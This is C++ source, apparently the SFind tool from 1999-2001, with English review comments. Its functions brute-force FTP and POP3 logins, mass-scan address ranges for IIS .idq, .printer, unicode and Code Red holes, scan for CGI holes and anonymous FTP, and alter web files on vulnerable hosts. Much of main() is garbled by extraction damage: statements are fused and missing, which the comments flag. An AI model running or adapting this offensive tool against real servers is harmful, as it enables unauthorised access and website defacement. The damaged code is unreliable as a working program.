

/* 
=========SFind command line super tools version 1.9==========  
========By Sunw 1999-2001. http://sw_sun.myetang.com========= 
*/ 
#include "afxext.h" 
#include "winsock.h" 
#include "iostream.h" 
#include "fstream.h" 
#include "unicode.h" 
#include "windows.h" 
// Function declarations (comments translated from the original Chinese).
void plango();// progress display
bool ResetCursor(int y, int x);// set the console cursor coordinates
UINT cracker(LPVOID pass);// FTP / POP3 exhaustive password guessing
void checkiisholetype();// check which IIS vulnerability type is being scanned for
void TestThread(int thread=50);// test whether the current thread count is already full
void WaitThreadEnd();// wait for the threads to finish
void usage(char* prog);// help text
int passdigit(int type=0);// dictionary length; argument 0 (default) means a-z, 1 means 0-9, 2 means combined
                          // NOTE(review): the definition in this file only acts on 0 and 1
int uhack(char *ip);// modify the web files on a host that has the unicode vulnerability
void ver();// version banner
UINT ftpanonymous(LPVOID ip);// scan for anonymous FTP login
UINT cgiscan(LPVOID cgistr);// scan for CGI vulnerabilities
UINT iisscan(LPVOID ip);// scan for IIS vulnerabilities
UINT pscan(LPVOID port);// port scan
// Global state shared by main() and the worker routines.
HANDLE hstdout=NULL;
WSADATA wsadata;                     // handed to WSAStartup() in main()
// Output file; the stream is constructed during static initialisation,
// i.e. "sfind.txt" is opened before main() starts.
ofstream myf("sfind.txt",ios::ate);
HANDLE HMUTEX;

int maxthread=0;
int ok=0;
int nub=0;
int portip;                          // loop variable of the address sweeps in main()
int ipstart;                         // inet_addr() of the first address argument
int ipstop;                          // inet_addr() of the last address argument
int hoststart;                       // ntohl(ipstart)
int hoststop;                        // ntohl(ipstop)
int plan=0;
int line=5;
int searchnumber;                    // hoststop-hoststart, decremented for skipped addresses
int searchend=0;
int digit=1;                         // candidate length tracked by passdigit()

short portx;                         // index into ports[] in the standard port sweep

char strch[14];                      // characters inspected by passdigit()
char *type;                          // argv[1], set at the top of main()
char *message;                       // taken from argv[3] or argv[4] in main()
char *uhackip;                       // address string given to inet_addr() in cracker()
// Default points at a string literal through a non-const pointer; main()
// repoints it at argv[3] when five arguments are given.
char *webpath="c:\\inetpub\\wwwroot";
char sendbuf[100];
char checkhole[100];
char iisholemessage[100];
// cracker() appends this to "user " in a 100-byte stack buffer with
// strcpy/strcat and no length check.
char *ftpuser;

bool ptop=false;
bool porttype=false;                 // set once a port-scan argument form matched
bool ftpopt=false;                   // cracker(): true selects port 21, false port 110
bool connecterror=false;
bool endx=false;

CWinThread* pthread;                 // shadowed by same-named locals inside main()
// Entry point. With fewer than two arguments it prints the usage text and
// returns -1; otherwise it stores argv[1] in the global `type`, calls
// WSAStartup() requesting Winsock 1.1 and runs the selected mode.
// NOTE(review): this listing was damaged when the page was extracted - on
// several lines the text between a '<' and a later '>' is missing, which fuses
// unrelated statements and removes the boundaries between main() and the
// functions that followed it. Those lines are marked and kept exactly as found.
int main(int argc,char *argv[]) 
{ 
if (argc<2){usage(argv[0]);return -1;} 
type=argv[1]; 
// NOTE(review): damaged line - the text after the error message is lost.
if (WSAStartup(MAKEWORD(1,1),&wsadata)!=0){cout<<"wsatartup error"<7) 
		{  ver(); 
		   if (htonl(inet_addr(argv[4]))%256==0||htonl(inet_addr(argv[4]))%256==255) 
// NOTE(review): damaged line - the end of the address check and the start of
// the standard port-scan condition are fused here.
		   {cout<<"invalidation address."<7)||((argc==4)&&strlen(argv[2])>7&&strlen(argv[3])>7)) 
		{  ver(); 
		   porttype=true; 
		   // only one address given: use it as both ends of the range
		   if (argc==3) argv[3]=argv[2];                        
		   ipstart=inet_addr(argv[2]); 
	       ipstop=inet_addr(argv[3]); 
           hoststart=ntohl(ipstart); 
		   hoststop=ntohl(ipstop); 
		   searchnumber=hoststop-hoststart; 
		} 
		 
		// custom port scan, argument form: 3389 127.0.0.1 127.0.0.255
	    if (((argc==5)&&(strlen(argv[2])<7)&&(strlen(argv[3]))>7&&(strlen(argv[4])>7))||((argc==4)&&(strlen(argv[2])<7)&&(strlen(argv[3])>7))) 
		{  ver(); 
		   porttype=true; 
		   // only one address given: use it as both ends of the range
		   if (argc==4) argv[4]=argv[3]; 
		   ipstart=inet_addr(argv[3]); 
	       ipstop=inet_addr(argv[4]); 
           hoststart=ntohl(ipstart); 
		   hoststop=ntohl(ipstop); 
		   searchnumber=hoststop-hoststart; 
		} 
        // walk the range in host byte order, one address per iteration
        for (portip=hoststart;hoststart<=hoststop;hoststart++,portip++,nub++,maxthread++,searchend++,plan++) 
		{ 
            if ((portip%256)==0)   {searchnumber--;nub--; maxthread--;continue;} // skip when portip%256 is 0 (original comment: "localhost address")
            if ((portip%256)==255) {searchnumber--;nub--;maxthread--;continue;}  // skip when portip%256 is 255 (original comment: "broadcast address")
            // custom port scan: 3389 127.0.0.1 127.0.0.255
            if (((argc==5)&&(strlen(argv[2])<7)&&(strlen(argv[3]))>7&&(strlen(argv[4])>7))||((argc==4)&&(strlen(argv[2])<7)&&(strlen(argv[3])>7))) 
			{ 
			    TestThread(); 
		        CWinThread* pthread=AfxBeginThread(pscan,LPVOID(argv[2])); 
				Sleep(10);// delay for reading the IP address (original comment)
			} 
            // standard port scan: -p 127.0.0.1 127.0.0.255
           if ((argc==3)&&(strlen(argv[2])>7)||((argc==4)&&strlen(argv[2])>7&&strlen(argv[3])>7)) 
		   { 
               // one worker per entry of ports[] (declared outside this listing)
               for (portx=0;portx<10;portx++,maxthread++) 
			   { 
				   TestThread(); 
	               CWinThread* pthread=AfxBeginThread(pscan,LPVOID(ports[portx])); 
	               Sleep(10); // delay for reading the IP address (original comment)
			   } 
		    	maxthread--; 
		   } 
		} 
		// no port-scan argument form matched: show usage and fail
		if(porttype==false) {usage(argv[0]);return -1;} 
		WaitThreadEnd(); 
// NOTE(review): damaged line - the end of the port-scan branch and the
// argument-count check of the following mode are fused here.
	  cout<5) {usage(argv[0]);return -1;} 
		  if (argc==5)        {webpath=argv[3];message=argv[4];} 
		  if (argc==4)        message=argv[3]; 
		  ver(); 
		  uhack(argv[2]); 
		  break; 
	 } 
	// IIS vulnerability scan
	 if (stricmp(type,"-idq")==0||stricmp(type,"-pri")==0||stricmp(type,"-uni")==0||stricmp(type,"-codered")==0) 
	 { 
	    checkiisholetype(); 
		// only one address given: use it as both ends of the range
		if (argc==3)  argv[3]=argv[2]; 
		ver(); 
	    ipstart=inet_addr(argv[2]); 
	    ipstop=inet_addr(argv[3]); 
        hoststart=ntohl(ipstart); 
        hoststop=ntohl(ipstop); 
		searchnumber=hoststop-hoststart; 
        // one iisscan worker per address; the address is passed by value in the LPVOID
        for (portip=hoststart;portip<=hoststop;portip++,nub++,maxthread++,plan++,searchend++) 
		{   if (plan>=3) {plan=-1;} 
            if ((portip%256)==0)   {searchnumber--;maxthread--;nub--;continue;} // skip when portip%256 is 0 (original comment: "localhost address")
            if ((portip%256)==255) {searchnumber--;maxthread--;nub--;continue;} // skip when portip%256 is 255 (original comment: "broadcast address")
            TestThread(); 
	        CWinThread* pthread=AfxBeginThread(iisscan,LPVOID(portip)); 
		} 
	    WaitThreadEnd(); 
// NOTE(review): from here to the closing brace the listing appears to be
// fragments of the rest of main() and of later functions (usage text, a
// connect() call, thread-count and progress handling) fused by the extraction
// damage; nothing below can be read as a complete statement sequence.
	    cout<"<<" "<: "<     Scan port"<                   Scan cgi hole"<             Scan .printer hole"<             Scan unicode hole"<             Scan .idq hole"<             Scan codered virus host"<  [-admin]   Ftp default and admin accounts check"< [Web path]  Modify web files"<+>"); 
	               strcat(mymessage,webpath); 
				   strcat(mymessage,modify[i]); 
                   s=socket(AF_INET,SOCK_STREAM,0); 
                   if (connect(s,(struct sockaddr *)&server,sizeof(server))==SOCKET_ERROR) 
				   {cout<<"connect error"<thread) 
		{//cout<<"thread"<=3) {plan=-1;} 
	return; 
} 
// Track the candidate length. When the global `digit` is between 1 and 13 and
// each of the first `digit` characters of the global `strch` equals the last
// symbol of the chosen alphabet ('z' for type 0, '9' for type 1), `digit` is
// incremented. Any other `type` value leaves `digit` unchanged.
// The parameter `type` hides the global of the same name inside this function.
// Always returns 0.
int passdigit(int type)
{
	char last;
	if (type==0)      last='z';   // letter roll-over
	else if (type==1) last='9';   // numeric roll-over
	else return 0;

	// Lengths are visited in increasing order, so an increment made for one
	// length is tested again against the next length within the same call.
	// strch holds 14 bytes; the highest index read here is 12.
	for (int len=1;len<=13;len++)
	{
		if (digit!=len) continue;
		bool saturated=true;
		for (int pos=0;pos<len;pos++)
		{
			if (strch[pos]!=last) {saturated=false;break;}
		}
		if (saturated) digit++;
	}
	return 0;
}
//穷举函数 
UINT cracker(LPVOID pass) 
{  
	char static *ftppassword=(char*)pass,checkhole1[5],checkhole2[5],checkhole3[5]; 
	char recvbuf[500],ftpsendpass[100],ftpsenduser[100],recvbufpop[500]; 
    SOCKET s; 
	sockaddr_in server; 
	server.sin_family=AF_INET; 
    server.sin_addr.s_addr=inet_addr(uhackip); 
	if (ftpopt==true) 
    server.sin_port=htons(21); 
	else server.sin_port=htons(110); 
	//显示进度 
	cout<<"Test: "<<(char *)pass<<"\r"; 
    //设置套接字为非阻塞模式 
    struct fd_set mask; 
    struct timeval timeout; 
	strcpy(ftpsenduser,"user "); 
	strcat(ftpsenduser,ftpuser); 
	strcat(ftpsenduser,"\r\n"); 
    strcpy(ftpsendpass,"pass "); 
    strcat(ftpsendpass,ftppassword); 
    strcat(ftpsendpass,"\r\n"); 
	s=socket(AF_INET,SOCK_STREAM,0); 
	if (ftpopt==true) 
	{ 
		strcpy(checkhole1,"220"); 
	    strcpy(checkhole2,"331"); 
	    strcpy(checkhole3,"230"); 
	} 
	else 
	{ 
		strcpy(checkhole1,"+OK "); 
	    strcpy(checkhole2,"+OK "); 
		strcpy(checkhole3,"+OK "); 
	} 
    if (s==INVALID_SOCKET) {cout<<"Socket() Error"<